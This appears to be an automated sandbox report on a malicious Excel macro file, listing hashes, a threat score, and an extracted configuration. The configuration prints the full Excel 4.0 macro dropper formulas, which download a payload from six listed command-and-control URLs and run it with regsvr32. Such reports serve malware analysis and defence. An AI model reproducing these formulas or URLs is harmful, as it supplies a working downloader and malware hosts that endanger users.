Overview

overview

10

Static

static

10

e8b739f3f1...f.xlsm

windows7-x64

10

e8b739f3f1...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    e8b739f3f116d4c924ce38426f34e4ebaaee8722298f4508979d2a1840c663cf

  • Size

    49KB

  • Sample

    241120-zt27vasgkc

  • MD5

    0cafedcb1220f5c1ed133535ceeb84b2

  • SHA1

    9a0b7c82472a24be402d9eef1d41c324f64d651d

  • SHA256

    e8b739f3f116d4c924ce38426f34e4ebaaee8722298f4508979d2a1840c663cf

  • SHA512

    4754cc7a4c7bf5ecc6ed50a80605ac4c18f659f944607676385549bb5748eae93221e041d693d7f132873f31fe2e37e58ccb6786c8d4bc074347f94128614493

  • SSDEEP

    768:WYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:WYu2xXncDSmSIBlGeuSEcm2h0B5lqB

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://retailhpsinterview.com/search/yNbsL/

http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/

http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/

http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/

https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/

https://gsmjordan.com/SupplierPanel/XII/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://retailhpsinterview.com/search/yNbsL/
xlm40.dropper

http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
xlm40.dropper

http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
xlm40.dropper

http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
xlm40.dropper

https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
xlm40.dropper

https://gsmjordan.com/SupplierPanel/XII/

Targets

    • Target

      e8b739f3f116d4c924ce38426f34e4ebaaee8722298f4508979d2a1840c663cf

    • Size

      49KB

    • MD5

      0cafedcb1220f5c1ed133535ceeb84b2

    • SHA1

      9a0b7c82472a24be402d9eef1d41c324f64d651d

    • SHA256

      e8b739f3f116d4c924ce38426f34e4ebaaee8722298f4508979d2a1840c663cf

    • SHA512

      4754cc7a4c7bf5ecc6ed50a80605ac4c18f659f944607676385549bb5748eae93221e041d693d7f132873f31fe2e37e58ccb6786c8d4bc074347f94128614493

    • SSDEEP

      768:WYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:WYu2xXncDSmSIBlGeuSEcm2h0B5lqB

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks